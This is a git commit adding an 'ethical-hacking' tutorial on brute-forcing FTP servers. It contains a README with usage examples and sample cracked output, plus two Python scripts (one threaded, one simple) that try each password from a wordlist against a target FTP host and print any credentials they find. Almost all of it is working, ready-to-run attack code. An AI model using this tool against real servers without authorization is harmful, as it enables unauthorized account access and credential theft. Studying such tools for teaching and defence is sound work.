added ftp cracker tutorial

x4nth055 · x4nth055 · commit ad8f004f6f5d · 2020-02-20T13:34:23.000+01:00
diff --git a/README.md b/README.md
@@ -22,6 +22,7 @@ This is a repository of all the tutorials of [The Python Code](https://www.thepy
     - [How to Brute-Force SSH Servers in Python](https://www.thepythoncode.com/article/brute-force-ssh-servers-using-paramiko-in-python). ([code](ethical-hacking/bruteforce-ssh))
     - [How to Build a XSS Vulnerability Scanner in Python](https://www.thepythoncode.com/article/make-a-xss-vulnerability-scanner-in-python). ([code](ethical-hacking/xss-vulnerability-scanner))
     - [How to Use Hash Algorithms in Python using hashlib](https://www.thepythoncode.com/article/hashing-functions-in-python-using-hashlib). ([code](ethical-hacking/hashing-functions/))
+    - [How to Brute Force FTP Servers in Python](https://www.thepythoncode.com/article/brute-force-attack-ftp-servers-using-ftplib-in-python). ([code](ethical-hacking/ftp-cracker))
 
 - ### [Machine Learning](https://www.thepythoncode.com/topic/machine-learning)
     - ### [Natural Language Processing](https://www.thepythoncode.com/topic/nlp)
diff --git a/ethical-hacking/ftp-cracker/README.md b/ethical-hacking/ftp-cracker/README.md
@@ -0,0 +1,44 @@
+# [How to Brute Force FTP Servers in Python](https://www.thepythoncode.com/article/brute-force-attack-ftp-servers-using-ftplib-in-python)
+To run this:
+- `pip3 install -r requirements.txt`
+- Use `ftp_cracker.py` for fast brute force:
+    ```
+    python ftp_cracker.py --help
+    ```
+    **Output:**
+    ```
+    usage: ftp_cracker.py [-h] [-u USER] [-p PASSLIST] [-t THREADS] host
+
+    FTP Cracker made with Python
+
+    positional arguments:
+    host                  The target host or IP address of the FTP server
+
+    optional arguments:
+    -h, --help            show this help message and exit
+    -u USER, --user USER  The username of target FTP server
+    -p PASSLIST, --passlist PASSLIST
+                            The path of the pass list
+    -t THREADS, --threads THREADS
+                            Number of workers to spawn for logining, default is 30
+    ```
+- If you want to use the wordlist `wordlist.txt` in the current directory against the host `192.168.1.2` (can be domain or private/public IP address) with the user `user`:
+    ```
+    python ftp_cracker.py 192.168.1.2 -u user -p wordlist.txt
+    ```
+- You can also tweak the number of threads to spawn (can be faster, default is 30):
+    ```
+    python ftp_cracker.py 192.168.1.2 -u user -p wordlist.txt --threads 35
+    ```
+- Output can be something like this:
+    ```
+    [!] Trying 123456
+    [!] Trying 12345
+    ...
+    [!] Trying sweety
+    [!] Trying joseph
+    [+] Found credentials:
+            Host: 192.168.1.113
+            User: test
+            Password: abc123
+    ```
diff --git a/ethical-hacking/ftp-cracker/ftp_cracker.py b/ethical-hacking/ftp-cracker/ftp_cracker.py
@@ -0,0 +1,78 @@
+import ftplib
+from threading import Thread
+import queue
+from colorama import Fore, init # for fancy colors, nothing else
+
+# init the console for colors (for Windows)
+# init()
+# initialize the queue
+q = queue.Queue()
+
+# port of FTP, aka 21
+port = 21
+
+def connect_ftp():
+    global q
+    while True:
+        # get the password from the queue
+        password = q.get()
+        # initialize the FTP server object
+        server = ftplib.FTP()
+        print("[!] Trying", password)
+        try:
+            # tries to connect to FTP server with a timeout of 5
+            server.connect(host, port, timeout=5)
+            # login using the credentials (user & password)
+            server.login(user, password)
+        except ftplib.error_perm:
+            # login failed, wrong credentials
+            pass
+        else:
+            # correct credentials
+            print(f"{Fore.GREEN}[+] Found credentials: ")
+            print(f"\tHost: {host}")
+            print(f"\tUser: {user}")
+            print(f"\tPassword: {password}{Fore.RESET}")
+            # we found the password, let's clear the queue
+            with q.mutex:
+                q.queue.clear()
+                q.all_tasks_done.notify_all()
+                q.unfinished_tasks = 0
+        finally:
+            # notify the queue that the task is completed for this password
+            q.task_done()
+
+
+if __name__ == "__main__":
+    import argparse
+    parser = argparse.ArgumentParser(description="FTP Cracker made with Python")
+    parser.add_argument("host", help="The target host or IP address of the FTP server")
+    parser.add_argument("-u", "--user", help="The username of target FTP server")
+    parser.add_argument("-p", "--passlist", help="The path of the pass list")
+    parser.add_argument("-t", "--threads", help="Number of workers to spawn for logining, default is 30", default=30)
+
+    args = parser.parse_args()
+    # hostname or IP address of the FTP server
+    host = args.host
+    # username of the FTP server, root as default for linux
+    user = args.user
+    passlist = args.passlist
+    # number of threads to spawn
+    n_threads = args.threads
+    # read the wordlist of passwords
+    passwords = open(passlist).read().split("\n")
+
+    print("[+] Passwords to try:", len(passwords))
+
+    # put all passwords to the queue
+    for password in passwords:
+        q.put(password)
+
+    # create `n_threads` that runs that function
+    for t in range(n_threads):
+        thread = Thread(target=connect_ftp)
+        # will end when the main thread end
+        thread.daemon = True
+        thread.start()
+    # wait for the queue to be empty
+    q.join()
diff --git a/ethical-hacking/ftp-cracker/requirements.txt b/ethical-hacking/ftp-cracker/requirements.txt
@@ -0,0 +1 @@
+colorama
diff --git a/ethical-hacking/ftp-cracker/simple_ftp_cracker.py b/ethical-hacking/ftp-cracker/simple_ftp_cracker.py
@@ -0,0 +1,39 @@
+import ftplib
+from colorama import Fore, init # for fancy colors, nothing else
+
+# init the console for colors (for Windows)
+init()
+# hostname or IP address of the FTP server
+host = "192.168.1.113"
+# username of the FTP server, root as default for linux
+user = "test"
+# port of FTP, aka 21
+port = 21
+
+def is_correct(password):
+    # initialize the FTP server object
+    server = ftplib.FTP()
+    print(f"[!] Trying", password)
+    try:
+        # tries to connect to FTP server with a timeout of 5
+        server.connect(host, port, timeout=5)
+        # login using the credentials (user & password)
+        server.login(user, password)
+    except ftplib.error_perm:
+        # login failed, wrong credentials
+        return False
+    else:
+        # correct credentials
+        print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET)
+        return True
+
+
+# read the wordlist of passwords
+passwords = open("wordlist.txt").read().split("\n")
+print("[+] Passwords to try:", len(passwords))
+
+# iterate over passwords one by one
+# if the password is found, break out of the loop
+for password in passwords:
+    if is_correct(password):
+        break
diff --git a/ethical-hacking/ftp-cracker/wordlist.txt b/ethical-hacking/ftp-cracker/wordlist.txt
